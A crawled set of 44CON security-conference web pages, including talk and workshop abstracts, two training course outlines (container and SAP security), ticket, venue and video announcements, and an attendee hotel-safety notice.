          Obtenez des mises à jour instantanées de vos amis, d'experts dans votre domaine, de vos célébrités préférées et de tout ce qui se passe dans le monde.

          Qu'est-ce que Twitter ? En savoir plus.

          #####EOF##### 44CON CYBER SECURITY 2015 Presentations – 44CON

          44CON CYBER SECURITY 2015 Presentations

          Presentation and Communication Skills for Security Professionals (Alternative Title: Hacking the Conversation)

          Presented By: Jerry Gamblin

          How you communicate in meetings, emails, presentations and hallway talks can make the difference between running a successful security program and a struggling one.

          Jerry has spent the better part of the last 10 years working on being a better communicator and will share some of the tactics that have (and haven’t) worked for him with you.

          track: Technical


          Law Enforcement and Technology, how is the future looking?

          Presented By: Ian Maxted

          As law enforcement deals with the ever increasing complexities of technological growth, necessary skillsets, technical implementation and legislation can be a stumbling block not just for industry.

          It is widely considered that law enforcement are typically well behind the curve when it comes to cyber criminality. Ian will look at how that appetite has changed and how industry becomes pivotal to helping the police service fulfil its guardianship status, now that the Internet is firmly in our daily lives.


          Cyber Myths and Monsters: how to raise awareness and change behaviour

          Presented By: Jessica Barker

          Cyber insecurity often feels like a horror story, and the idea of cyber security an out-of-reach myth. The last year has seen breaches that are bigger, and of a higher profile, than ever before. When we trace these breaches back to their cause, we often find that attackers took advantage of human behaviour, via social engineering, poor password management, gaps in physical security or malicious insiders. Organisations are increasingly focused on raising cyber security awareness, and the UK government has spent millions of pounds on the Cyber Streetwise campaign, and yet we seem to be making little (if any) progress when it comes to changing behaviours.

          Jessica’s talk argues that, in lots of ways, we are making fundamental mistakes when it comes to our attempts to raise awareness. Combining sociological and psychological research with mythology and classic horror fiction, this talk highlights lessons we can learn in our approach to raising cyber security awareness. Emphasising ways we can positively engage with users to change behaviours for the better, this talk aims to provoke ideas and discussions that will lead to awareness-raising programmes that are focused on what the user needs to know, and how we should be telling them, to achieve the most impact and make cyber security less of a monster.


          Not following the herd – how to make your voice matter in the corporate world

          Presented By: Quentyn Taylor

          First Quentyn will look at how to make your voice heard and relevant to a modern fast paced business. He will look at building a security message and making it count, challenging commonly held perceptions in risk and always being aware of the echo chamber.


          Pitfalls of Public Cyber Data

          Presented By: Phil Huggins & Ernest Lee

          There are increasingly many data-driven cyber reports published and these are being relied upon to support strategic cyber decision-making in organisations. In order to conduct a meta-analysis of reported cyber data to support the development of a strategic cyber threat assessment at Stroz Friedberg we reviewed the quality of available data and reports. Here we will highlight some of the pitfalls inherent in these sources that should be considered when using them and makesome recommendations for the publication of data-driven cyber reports.


          Legal Drivers in Cyber Security: Many or None?

          Presented By: Dai Davis

          What are the real drivers for Cyber Security? Certainly not the Data Protection legislation, which, while theoretically being enforceable with a fine of up to £500,000, is rarely enforced. Most breaches of that legislation go unnoticed, let alone invoke a sanction. Most businesses will retort that they are concerned about their reputation, but does the truth match the perception? Dai explores the dangers of lack of security and what businesses can and do suffer as a result of lack of security. Criminal sanctions in the form of the Computer Misuse Act, 1990 are examined as is the civil fining regime of the Data Protection legislation. There is also the possibility under this latter data protection legislation for an aggrieved individual to claim damages, but as Dai shows, this also is a theoretical rather than a practical remedy. Dai examines the purely economic risk of “loss of reputation” as well as the special case of businesses falling under the remit of the Financial Conduct Authority. Dai will also examine the implications of lack of security in the Internet of Things and whether there are legislative or other drivers to make the Internet of Things secure.


          Security from Necessity

          Presented By: Joe Goodings

          How working for Greenpeace has influenced my thoughts on information security.  I set out these ideas and give a small case study showing them in operation. Then open up for discussion on the pros & cons of the approach.


          The current picture (literally) of European Cyber Crime

          Presented By: Kevin Williams

          Kevin will present data from Team Cymru that gives an insight into the current real threats against the UK in conparison to the rest of Europe.

          #####EOF##### ILEC Conference Centre – 44CON

          ILEC Conference Centre

          One of the largest Conference-Hotels in West London, ILEC Conference Centre offers a capacious and flexible event hall at around 1500sqm in a single space as well as 5 additional syndicate rooms.

          Free secure wireless networking will be available to all attendees and sponsors in the conference area.

          The conference centre is a short walk from the West Brompton and Earls Court Underground Stations. Hyde Park, Kensington Palace and Gardens, The Royal Albert Hall, The Natural History Museum, Science and Victoria & Albert Museums are a short walk away for your security conference tourism convenience! With the rest of central London within easy reach.

          #####EOF##### Mastering Container Security – 44CON

          Mastering Container Security

          Presented By: Rory McCune

          Containers and container orchestration platforms such as Kubernetes are on the rise throughout the IT world, but how do they really work and how can you attack or secure them?

          This course breaks down the fundamental components of Docker and Linux containers, showing how they work together to create isolated environments for applications.

          We’ll also be covering fundamental Linux security concepts such as namespaces, cgroups, capabilities and seccomp, along with showing how to secure (or break into) container-based applications.

          The course will then move on to the world of container orchestration and clustering, looking at how Kubernetes works and the security pitfalls that can leave the clusters and cloud-based environments which use containers exposed to attack.

          The 2 day course will take place on the 10th & 11th September 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Guidance on how to effectively use Docker to  build secure and performant container images.
          • Details on how Linux containers are constructed and secured, including cgroups, namespaces, capability and seccomp filtering.
          • Hardening guidance for Docker Engine instances.
          • Introduction to container clustering and orchestration with Docker Swarm.
          • Secure configuration and attacks of Kubernetes clusters.
          • Techniques for effectively assessing the security of container images.

          Course Outline

          Day 1:

          • Docker Basics
          • Using Docker – This starts with basic Docker commands to familiarise students with how they work.
          • Docker networking – A look at how Docker networking operates and the options available that can be used to help isolate potentially dangerous containers.
          • Creating Docker Images – Covering how to create Docker images with examples around security tool creation.
          • Container Fundamentals – This delves into Linux container primitives, such as namespaces, cgroups, capabilities and seccomp filtering, essentially showing how container security is applied.
          • Docker Security – This looks at primary security concerns around the use of Docker Engine, including common pitfalls and how to attack or mitigate them.
          • Extras – Depending on how fast the students have been working through the day’s content, some extras can be covered, such as looking at the wider Docker ecosystem and some tooling to help manage containers more easily.

          Day 2:

          • Docker Swarm – this looks at the in-built Docker container orchestration platform, Docker Swarm, how its security is implemented and common weaknesses that might be exploited by attackers to compromise it.
          • Introduction to Kubernetes – Here we’ll cover the Kubernetes container orchestration platform and look at how it’s architected and composed. The goal is to familiarise students with how the platform operates so they can understand key areas of security concern/points of attack.
          • Kubernetes Security – This module looks at three major threat models for Kubernetes clusters (external attackers, compromised containers, and malicious users) and walks through the likely attack paths that each would take, showing practical approaches to exploiting Kubernetes security weaknesses.
          • Openshift and Amazon ECS – A quick look at some of the other commonly encountered options for containerization and possible security concerns in each of these.

          Target Audience

          Security employees, from both blue teams (internal defence) and red teams (external testers) who are looking to get a better understanding of containerisation and its security concerns.

          Student Requirements

          The course assumes a reasonable level of familiarity with Linux basics, but no familiarity with containerisation.

          What to Bring

          • Working laptop where you have administrator rights

          Software Requirements

          • Linux / Windows / Mac OS X desktop operating systems
          • SSH client capable of using key based logins

          Students will be provided with

          Copies of the course including all exercises and Virtual Machine images used during the course.

          About the Trainer

          LEAD INSTRUCTOR – Rory McCune @raesene

          Rory has worked in the Information and IT Security arena for the last 18 years in a variety of roles, from financial services, to running a small testing company, to working for large companies as a consultant. These days he spends most of his work time on application, cloud and container security.

          He’s an active member of the UK InfoSec community and has been presenting at security and general IT conferences for the last 8 years, including having the accolade of, currently, being the only person to have spoken at all the UK BSides conferences. When he’s not working he can generally be found out and about enjoying the scenery in the Highlands of Scotland, if the midgies aren’t biting!

          Book your 44CON 2019 training course now!

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### 44CON Assistance tickets – 44CON

          44CON Assistance tickets

          Would you like to attend 44CON but don’t have the means to make it happen?

          We realise that not everyone is able to to fund their own conference attendance. In partnership with our sponsors, we’ve launched an assistance program to provide the opportunity to attend 44CON to those who wouldn’t be able to come otherwise.

          Wire Security logo -2019 assistance

          We are pleased to announce that the first Assistance Sponsor for 44CON 2019, sponsoring two tickets, is Wire Security bvba. Watch this space for details of the 2019 assistance program and application process.

          The fine print:

          • Details provided for assistance ticket applications will be used for the selection process, event registration and hotel reservations in line with the 44CON Privacy Policy.
          • Assistance tickets are not transferable.
          • Attendance to the event is subject to the 44CON house rules.
          #####EOF##### Win CRESTCon 2019 Tickets! – 44CON

          Win CRESTCon 2019 Tickets!

          We’ve teamed up with CREST to give everyone the opportunity to win one of 5 (count ’em) CRESTCon 2019 tickets, worth £175 each. If you’ve never been, now’s your chance. If you’ve been before but don’t have a ticket, now’s your chance too!

          CRESTCon is a one-day event organised by CREST, the international certification body for the technical information security market. This year’s CRESTCon is on March 14th at the Royal College of Physicians. If you’re on our 44CON training courses in the same week and/or are coming to 44CONnect, then this is a competition worth taking part in.

          To win a CRESTCon ticket, all you need to do is make sure you’re signed up to our mailing list, and email training@44con.com from the address you’ve registered. To shamelessly stack the cards in favour of training attendees and early bird ticket holders, we’ve sliced our 5 ticket allocation the following way:

          Some of the talks we’re most looking forward to at this year’s CRESTCon include:

          • Matt Lorentzen – Sheepl – Automating people for Red and Blue Team Tradecraft
          • Thomas V. Fischer – Building a Personal Data Focused Incident Response Plan to Address Breach Notification
          • Martin Jordan – Austerbury: Iranian cyber threat briefing

          Winners will be chosen at random over the course of February. Get your entry in quick because like our early bird tickets, once they’re gone, they’re gone!

          #####EOF##### DSC_4933-1 – 44CON

          DSC_4933-1

          #####EOF##### 44CON 2018 Workshops – 44CON

          44CON 2018 Workshops

          For a full list of 44CON 2018’s confirmed speakers, please click here.

          Bug Bounties: An introduction and path way to winning at bug bounties

          Presented by: Shubham Shah and Nathan Wakelam

          Today we finally live in a world where we can hack into a diverse range of companies, legally, whenever we want, and get paid for it!

          This workshop is primarily for pentesters wanting to learn about the entire process of participating in bug bounties and how to do it well. This workshop will help participants with the following:

          • Which company do I hack, and which platform or program is right for me?
          • How do I (better) discover assets owned by an organisation to maximise attack surface?
          • How does bug bounty hunting differ from pentesting? (while they share similarities, the methodologies for finding bugs can be vastly different)
          • How do I write a good bug bounty report? (including platform specific tips and many examples)
          • How far do I go when I find a security issue to prove its severity? (mostly based off my experience in this tricky area)
          • What should I expect from a bounty and what do they expect from me? (maintaining good relationships with bounty programs)

          (60 minute workshop)

          Windows Internals and Local Attack Surface Analysis using Powershell

          Presented by: James Forshaw

          Inspecting the internals of Microsoft Windows and discovering interesting attack surfaces for local privilege escalation can be a dark art. Outside of trivial enumeration and fuzzing of drivers there’s little documentation about how you’d find interesting privileged attack surfaces such as brokers, internal RPC/DCOM services and badly configured applications to escape sandboxes and get administrator privileges.

          In this workshop we’ll go through how to use a number of PowerShell tools such as NtObjectManager (https://www.powershellgallery.com/packages/NtObjectManager) that I’ve written to help identify interesting attack surfaces and from that extracting information through reverse engineering to discover how they can be exploited. The workshop will also contain an overview of important areas of Windows internals as they relate to privilege escalation and how PowerShell can give you more a better understanding of how these internal features work together.

          Note this will be a 4 hr workshop rather than a 2 hr one.

          Orange is the new Hack: Introduction to Machine Learning with Orange

          Presented by: Philippe Arteau

          Analyzing large number of security alerts can be repetitive and tedious. To help cope with the growing complexity of systems, analysts can use machine learning algorithms and other data analysis concepts. By doing prediction, machine learning algorithm can help prioritize and even reduce the amount of manual work needed. Data analysis can also help gain a better understanding of our data.
          The workshop will introduce participants to the world of machine learning using the software Orange. A security-related scenario will be used for the hand-on exercises. For this scenario, a large dataset of vulnerabilities from web applications reported by a static analysis tool will be used. The dataset of vulnerabilities was enriched with key metadata that will help the algorithms. Some metadata will need transformation. Based on issues that were classified, it will be possible to predict which unclassified issues are likely to be actual vulnerabilities.
          The attendants will be able to apply the same principles to the dataset in other contexts such as malware classification, system alert classification, vulnerability management, etc.

          Breaking (All) Applications With Frida

          Presented by: Jay Harris

          Frida is a framework which allows us to inject JavaScript into running applications. This has made reverse engineering and modifying applications easier than ever. Although Frida has a large following amongst mobile application testers, Frida also supports desktop applications and with not much effort it is possible to profile, debug and patch code.

          This 2 hour workshop will go though the basics of using Frida on Linux and Android and through exercises and walkthroughs show how Frida can be used to rapidly reverse engineer applications to understand logic flow, dump secrets and bypass security controls.

          Although what we look at here is relevant to mobile applications, this is not a mobile hacking workshop (in fact, most exercises will take place on Linux binaries) but might be useful to mobile testers looking to take their security testing to the next level.

          Advanced Wireless Attacks Against Enterprise Networks

          Presented by: Gabriel Ryan

          This workshop will instruct attendees on how to carry out sophisticated wireless attacks against corporate infrastructure. Attendees will learn how to attack and gain access to WPA2-Enterprise networks, bypass network access controls, and perform replay attacks to gain administrative control over an Active Directory environment. External wireless adapters and networking hardware will be provided to all workshop attendees, and material learned in the lectures will be practiced within a realistic lab environment.

          Areas of focus include:

          • Wireless reconnaissance and target identification within a red team environment
          • Attacking and gaining entry to WPA2-EAP wireless networks
          • LLMNR/NBT-NS Poisoning
          • Firewall and NAC Evasion Using Indirect Wireless Pivots
          • MITM and SMB Relay Attacks
          • Downgrading modern SSL/TLS implementations using partial HSTS bypasses

          ARM IoT Firmware Emulation Workshop

          Presented by: Saumil Shah

          Learn how to build your own testing and debugging environment for analysing IoT firmware images. Bug hunting in IoT firmware requires access to debugging, instrumentation and reverse engineering tools.

          In this workshop, we shall learn how to extract firmware from a few ARM IoT devices, deploy the extracted filesystems on an ARM QEMU environment, and emulate the firmware as close to the original hardware environment as possible. We shall also learn how to intercept and emulate NVRAM access to faithfully reproduce the exact configuration available on the actual device. Participants are required to bring a laptop capable of running VMware Workstation/Fusion/Player. We shall distribute a virtual machine with ARM QEMU along with firmware images extracted on the spot from a few SoHo routers and IP Cameras.

          The methodology discussed in this workshop is put together from the author’s own beats. While we use ARM as the base platform, the same methodology can also work for MIPS or other embedded architectures.

          Length: 2 hours
          Skill level: Intermediate

          Developing Exploits with Scratch Workshop

          Presented by: Kevin Sheldrake and Tim Todd

          Scratch is a programming language and IDE targeted at teaching young children how to code. The environment is sprite-based with all code residing behind each of the sprites and the stage (background). It is particularly good at developing games not unlike the flash-based games of the 90s/00s. Typically, the Scratch environment is a sandbox limiting all actions to objects within its own world. With the offline version of Scratch v2, however, it is possible to load ‘experimental HTTP extensions’ that can introduce new blocks linked to python functions via a web service API.

          Using the experimental extensions, I have implemented a set of blocks that allow access to TCP/IP functions. With these blocks it is possible to fuzz and exploit vulnerable services on a network-accessible victim machine. As a demonstration I have developed a PoC for the web server running on Saumil Shah’s tinysploit (stack smash) plus PoCs for two echo servers I have added to it (stack smash and format string vulnerability).

          The aim of the workshop is for students to fuzz and develop exploits against (simple) vulnerable network services. Students will be provided with a Scratch environment (VM or bootable USB stick) plus a vulnerable VM to attack. Together we will fuzz and exploit two echo servers (stack smash and format string vulnerability) through interactive investigation in gdb and interactive development in Scratch. Students will then be encouraged to fuzz and develop an exploit against the vulnerable web server provided by tinysploit.

          Upon completion of the Scratch exploits, we will quickly cover how to achieve similar results directly with python.

          If you are new to penetration testing or have been around a while but have never developed your own exploit (maybe you don’t code so well in python or C, or maybe you aren’t comfortable with debugging in gdb) then this workshop will give you the skills to build exploits in Scratch and python and see how to apply this knowledge to more complicated environments.

          Sys Mon! Why yu nuh logging dat?

          Presented by: Charl van der Walt, Willem Mouton, Carl Morris and Wicus Ross

          Sysmon from Microsoft is a very powerful host-level tracing tool, which can assist in detecting advanced threats on your network. Its free with Windows and a native extension of the Windows stack. Sysmon performs system activity deep monitoring and logs high-confidence indicators of attacks and compromise, but in contrast to common Antivirus / HIDS solutions … its stable, mature, simple and FREE!

          • Sysmon can monitor lots of interesting activities, including:
          • Process creation (with full command line and hashes)
          • Process termination
          • Network connections
          • File creation timestamps changes
          • Driver/image loading
          • Remote thread creation
          • Raw disk access
          • Process memory access

          and more.

          Another cool technology – Windows Event Forwarding (WEF) – can then used to read the event log on a device and forward selected events to a Windows Event Collector (WEC) server.

          Put these two together, dump it into the SIEM, database or Elastic Stack of your choice, and you have yourself a pretty fine Windows Event monitoring and Threat Hunting platform.

          In this presentation we will introduce these powerful tools and show you how to implement WEF and deploy Sysmon using your existing AD infrastructure and Group Policy so there is minimal impact on resources, and how to remotely tune and improve the configuration as necessary.

          Win!

          So what then?

          We will then move on to explore how to extract ‘actionable’ intelligence from these logs – what to look for, how to spot it and what to do when you do find the mythical needle in the haystack, using real, practical examples from our own day-to-day operations.

          Finally, we will share in detail some of our experiment (failed and successful) with extracting even more value from these logs, for example:

          • Using Windows Event Logs via Sysmon to detect attacks on Web Applications
          • Performing Event Correlation by pulling Sysmon into MiSP
          • Using Python and scikit-learn to implement a semi supervised learning algorithm using a Markov chain random walk classifier to highlight anomalous events from large volumes of benign ones.

          Security module for php7 – Killing bugclasses and virtual-patching the rest!

          Presented by: Julien Voisin and Thibault Koechlin

          Suhosin is a great PHP module, but unfortunately, it’s getting old, new ways have been found to compromise PHP applications, and some aren’t working anymore; and it doesn’t play well with the shiny new PHP 7. As a secure web-hosting company, we needed a reliable and future-proof solution to address the flow of new vulnerabilities that are published every day. This is why we developed Snuffleupagus, a new (and open-source!) PHP security module, that provides several features that we needed: passively killing several PHP-specific bug classes, but also implementing virtual-patching at the PHP level, allowing to patch vulnerabilities in a precise, false-positive-free, ultra-low overhead way, without even touching the applications’ code.

          Source code: https://github.com/nbs-system/snuffleupagus

          Website: https://snuffleupagus.readthedocs.io/

          Twitter: https://twitter.com/sp_php

          Also check our list of Talks for 44CON 2018.

          %d bloggers like this:
          #####EOF##### 44CONnect – A 1-day invite-only event in March 2019 – 44CON

          44CONnect – A 1-day invite-only event in March 2019

          44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

          To qualify for an invite, you need to have done one of the following:

          There are 20 tickets available, so make sure you qualify!

          Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

          There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

          Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

          *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

          #####EOF##### 44CON 2016 – 44CON

          44CON 2016

          44CON 2016 will take place on 14th to 16th of September 2016 at the ILEC Conference Centre.

          Early Bird Tickets for 44CON 2016 went very quickly. Standard tickets are available in our shop.

          Accommodation:

          You can book a hotel room at the IBIS for:

          • £110 (inc VAT) per night for a single room
          • £120 (inc VAT) per night for a double or twin room

          Book rooms directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON2016D. There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

          #####EOF##### Rory McCune: Mastering Container Security | Sense/Net

          This 2 day course will take place on the 10th & 11th September 2019 at the Novotel London West in Hammersmith.

          For more information about this course, please check our website.

          A ticket for the training does not give you access to the conference, you will need to purchase a combined training course/44CON 2019 Conference ticket here if you wish to attend the conference as well.  A ticket for the training does not include accommodation, nor does it include a t/shirt.

          Please register for your course early! Courses require a minimum number of attendees to be conducted. We reserve the right to cancel a course if minimum numbers are not reached up to 3 weeks prior to the event. 

          Conference and training tickets are non-refundable as per our Terms of Service.



          TypeTraining
          VendorSense/Net
          Tags 44CON, 44CON 2019, Sense/Net, ticket, Training
          £1,300.00 GBP
          #####EOF##### 44CONnect March Week – What to expect – 44CON

          44CONnect March Week – What to expect

          We have a fantastic week planned from March 11th-14th with training, a day of talks and of course hanging out with our friends at CRESTCon. If you want to take part there’s still time, just book a seat on Rory’s course, or contact us from your early bird ticket e-mail address.

          Monday 11th March – Training

          Training opens at the Novotel London West for registration at 08:15 GMT with a 09:00 Start. Coffee and breakfast snacks will be available from 08:30. There are opportunities to break throughout the day and of course lunch is provided.

          Training tickets are available until we run out of seats or the 8th of March. There are hardly any seats left, so sales may close before the 8th. Book your seat now.

          Tuesday 12th March – Training

          Once again, doors open at 08:15 GMT. We’ll have breakfast snacks and coffee to keep you going, and lunch is provided in the restaurant.

          Wednesday 13th March – 44CONnect

          If you have an invite to 44CONnect, you’ll get an email telling you where it is. If you don’t, and want one, the easiest way is to book a seat on Rory’s course, or to email us if you’ve bought an Early Bird ticket.

          Doors open from 09:30 – 10:00 for a 10:00 start. Here’s the current schedule (subject to change):

          10:00 – Rory McCune – Container Security
          11:00 – Owen Shearing & Will Hunt – Exploiting in.security
          12:00 – Lightning talk round for attendees
          12:30 – Lunch (included for training attendees only)
          14:00 – Steve Lord – Let The Right One In: Enterprise Containerized Honeyclouds
          15:00 – Dave Ryan – Reporting is dead. Long live reporting.

          From 16:00 we’ll have an open drinks tab, then open the space up to the public from 17:00. If you don’t have an invite, drop @stevelord a DM on twitter around 16:00 and he’ll let you know where to go.

          Thursday 14th March – CRESTCon

          We’re really excited about CRESTCon. 5 Lucky people won CRESTCon tickets through our competition. We’ll have a table there with a new sticker design, so come over and say hello!

          As well as tickets, we’ll be there to answer questions about our CFP, talk about training and of course, check out the talks.

          CRESTCon takes place at the Royal College of Physicians, 11 St Andrews Pl, Regent’s Park, London NW1 4LE. Tickets cost £175 and are available from the CRESTCon site.

          #####EOF##### First Videos From 44CON 2018 Up – 44CON

          First Videos From 44CON 2018 Up

          For a long time we used to sell access to videos on Vimeo. Recently we moved back to making videos freely available on YouTube. Due to some last minute issues with 2018 we had to do a bit more work to get the 2018 videos to a point we were happy with. However, in 2019 the wonderful Ministraitor will be supporting our videos, and we’ll be able to provide them for free from now on. The first 5 videos from 2018’s 44CON are now ready to go, so read on for the vids and our thoughts.

          First up we have Mike Gianarakis and Shubham Shah’s Catch Me If You Can. Mike and Shubs have been working on ephemeral vulnerabilities for a while, and this is a great run-down of both ephemeral bugs as a class and some of their work in the bug bounty space in general.

          Guy Barnhart-Magen and Ezra Caltum talk about hacking Machine Learning, from bias and algorithms to exploiting Remote Code Execution bugs in ML frameworks.

          Much-loved 44CON regular Saumil Shah recovers from an rm -rf incident to deliver a great talk on advanced ARM Shellcode techniques. Expect constrained shellcode with lots of polyglot tricks along the way.

          Timo and Tomi knock it out of the park with their tale of extreme lockpicking. Over a decade these advanced persistent researchers started pulling hotel locks apart. What they found is hilarious, entertaining and downright disturbing. Truly, the industry’s Penn & Teller, only the smaller one talks!

          Jack Matheson shows us the future of networking, and how SmartNICs can help secure the datacentre of the future. We look forward to talks on hacking and backdooring SmartNIC implementations, but this rare (for 44CON) optimistic talk is one to watch.

          We’ll have more videos from 2018 up soon. Don’t forget to subscribe to our YouTube channel to catch them as they come out!

          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favorite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### SAP Cyber-Security for IT Security Practitioners – 44CON

          SAP Cyber-Security for IT Security Practitioners

          Presented By: Jordan Santarsieri

          SAP is a core part of the business-critical infrastructure of 95% of the biggest companies in the world, these companies rely on SAP to perform their most sensitive daily operations such as processing employees payroll and benefits, managing logistics, managing suppliers / customers, material management, releasing payments to providers, credit cards processing, business intelligence, etc.

          This training provides the latest information on SAP specific attacks and remediation / protection activities.

          This training starts with an introduction to SAP (No previous SAP knowledge is required), you will learn through several hands-on exercises and demos! how to perform your own vulnerability assessments, audits and penetration tests on your SAP platform,  you will be very well equipped to understand the critical risks your SAP platform may be facing, how to assess them and more importantly, you will know which are the best-practices to effectively mitigate them, pro-actively protecting your business-critical platform.

          We take pride in creating the most comprehensive SAP security agenda!

          The 2 day course will take place on the 10th & 11th September 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Learn the fundamentals of the SAP Architecture
          • Learn the main default misconfigurations that will allow anyone to completely compromise a vanilla SAP Installation
          • Learn more about the obscure SAP proprietary protocols
          • Learn about the SAP Components and how they collaborate with each other
          • Learn how to attack an SAP system without causing business disruption
          • Learn how to defend an SAP, preventing the most common attacks and hacking techniques

          Course Outline

          Day 1:

          • Introduction to SAP
          • What SAP security used to be in the past
          • What SAP security is nowadays
          • Introduction to SAP security tools (the open-source way)
          • Securing the SAP Infrastructure
          • SAP Router
          • SAP Web-dispatcher
          • The role of a firewall
          • How to attack and secure: SAP & Windows
          • How to attack and secure: SAP & Unix
          • How to attack and secure: SAP & Oracle
          • How to attack and secure: SAP & HANA
          • Evolution of Hana
          • HANA Internals
          • What is S/4HANA?
          • Authentication mechanisms
          • User Security
          • Password Policy
          • Authorizations
          • SAP Gateway & RFC
          • SAP Message Server
          • SAP Management Console

          Day 2:

          • SAP Solution Manager
          • SAP System Landscape Directory
          • ABAP Security
          • SAP Back-doors
          • SAP Updates
          • Encryption
          • SAP ICM (Continued)
          • SAP J2EE
          • Understanding the J2EE Framework
          • Different SAP Web J2EE Applications
          • J2EE Authentication Mechanisms
          • SAP JCO
          • SAP Security Audit Trail
          • How to react in case of an SAP Intrusion
          • SAP Lab – Packet wars! (Game subject to time constraints!!)

          Target Audience

          Security employees, from both blue teams who wishes to learn how to protect these so-far obscure ERP system and red teams who wishes to learn how to attack this highly critical assets.

          Security Consultants who are looking to expand their IT-Security portfolio, SAP administrators / auditors who wishes to learn more about the technical aspects of SAP security.

          Student Requirements

          The course assumes a reasonable level of familiarity with Linux basics and eagerness to learn new things!

          What to Bring

          • Working laptop where you have enough rights to install new software, connect to a wireless network and change your own IP address

          Software Requirements

          • Everything you need will be provided by your instructor

          Students will be provided with

          • A fully working virtualized platform containing everything you will need for the training!

          About the Trainer

          Lead Instructor – Jordan Santarsieri (@jsantarsieri)

          Mr Santarsieri is a founder partner at Vicxer where he utilizes his 12+ years of experience in the security industry, to bring top notch research into the ERP (SAP / Oracle) world.

          He is engaged in a daily effort to identify, analyze, exploit and mitigate vulnerabilities affecting ERP systems and business-critical applications, helping Vicxer’s customers (Global Fortune-500 companies and defense contractors) to stay one step ahead of cyber-threats.

          Jordan has also discovered critical vulnerabilities in Oracle and SAP software and is a frequent speaker at international security conferences such as Black-Hat, Insomnihack, YSTS, Auscert, Sec-T, Rootcon, NanoSec, Hacker Halted, OWASP US, 8dot8, DragonJAR and Ekoparty.

          Book your 44CON 2018 training course now!

          #####EOF##### help – 44CON

          On Hotel Accommodation And Safety

          First and foremost, if you’re attending 44CON, please add this phone number to your contacts list, under “44CON”. It’s our at-event emergency crew contact number:

          +44 (0)7955 376 729

          Recent events in Las Vegas as a result of policy changes following the Mandalay Bay shooting seriously affected some of our attendees visiting the city for conferences in early August. We watched from a distance in abject horror as people routinely had their privacy and safety compromised by aggressive security teams demanding entry to rooms and confiscating soldering irons and lockpicks, some of which we understand haven’t been returned to their owners.

          While we completely understand the need to beef up security in the shadow of yet another mass shooting in America, the horrific stories that unfolded on twitter made us ask ourselves what we were doing to ensure that such invasions of safety and privacy don’t happen here.

          To that end, we’ve done two things:

          1. We’ve asked the ILEC’s attached hotel under what terms they’ll enter rooms booked there.
          2. We’ve set up an emergency contact number you can call to reach the crew at any time during the event.

          In the UK there are reasons under which your hotel room can be forcefully entered, but generally it shouldn’t need to happen unless your stay is longer than a few days and you’ve left the Do Not Disturb tag on your door. This is partly to check that you’re still alive, and also to check you haven’t trashed the hotel room. From the ILEC:

          We do not access guests rooms apart from cleaning. If the Do not disturb sign is displayed up to 3 days we do not enter but after that we have to check. Initially we would ring the room and if the guest answers we would ask to go and see the room if it is inacceptable[sic] conditions ( as in damages).

          If there is a fire evacuation the fire marshals will go floor by floor and knock and open the rooms for people to evacuate as they can be asleep.

          The only other reason for someone to enter the room by force would be if the police or fire service needed to enter in an emergency.

          The author of this post is a man, but the 44CON crew are a mix of men and women. If you’re struggling to see why this is primarily a safety rather than privacy issue, I think Joe Fitz summed things up best in this twitter thread:

          “I sympathize with @maddiestone and @k8em0 ‘s experiences but realize I can’t possibly know how terrified they probably felt.”

          Once again, that emergency crew number is:

          +44 (0)7955 376 729

          If you’re attending 44CON, please add this number to your contacts. It’ll only be active during the event, but someone will have the phone 24×7. Please don’t abuse this number, as it may block the line for someone who needs it.

          Fundamentally, your safety is the most important thing to us. If we can’t get that right, nothing else matters. While we don’t expect problems, should anything happen that could compromise your safety:

          1. If you’re in your room and something is happening outside, make sure the room is locked. Do not let anyone into your room if you don’t want to.
          2. Dial reception on the in-room phone and tell them what’s happening, and what you need them to do.
          3. Let us know something’s happened via email so we can track it, regardless of whether it’s been resolved.
          4. If it’s unresolved, or you feel your safety is being threatened then call +44 (0)7955 376 729. We’ll sort things out from there.
          5. In case you need it, please remember that the emergency services number is 999 in the UK, not 911. 112 will also work.

          We don’t expect anyone to need this, but if you do, we’ll do our best to keep you safe.

           

          #####EOF##### workshops – 44CON

          Advanced Wireless Attacks Against Enterprise Networks (Gabriel Ryan): Workshop Pre-Requisites

          Lab Materials for Advanced Wireless Attacks Workshop
          For those of you planning on attending the Advanced Wireless Attacks workshop tomorrow, we highly recommend downloading the course materials in advance. The workshop includes a course package that contains the following items:
          • A pre-configured Kali VM loaded with each of the tools you’ll be using during the workshop
          • A step-by-step lab setup guide
          • A detailed course guide to supplement the material covered in the workshop
          Most of the hands-on exercises will take place inside of an Active Directory lab running on your laptop. If you plan on following along with the lab material, please try to get the lab up and running before the start of the session by following the steps in the setup guide. The lab setup process is mostly automated, but some of the files may take a while to download.
          If you run into any issues setting up your lab environment, please do not hesitate to get in contact with the instructor at training@digitalsilence.com — he will be available today as well as early tomorrow morning to sort out any issues you may encounter.

          What To Expect On Thursday Night

          44CON’s a bit different to some other cons in that we tend to run our own Thursday night entertainment instead of a traditional sponsor party. Sponsors and others are welcome to run their own events if they prefer, and indeed, this year some are. Last year was a little quiet, mostly due to Steve not being well enough to plan things.

          If you’ve never been to a 44CON, or if last year was your first, you might not expect much, but this year we have a lot going on.

          HackerOne_black_1

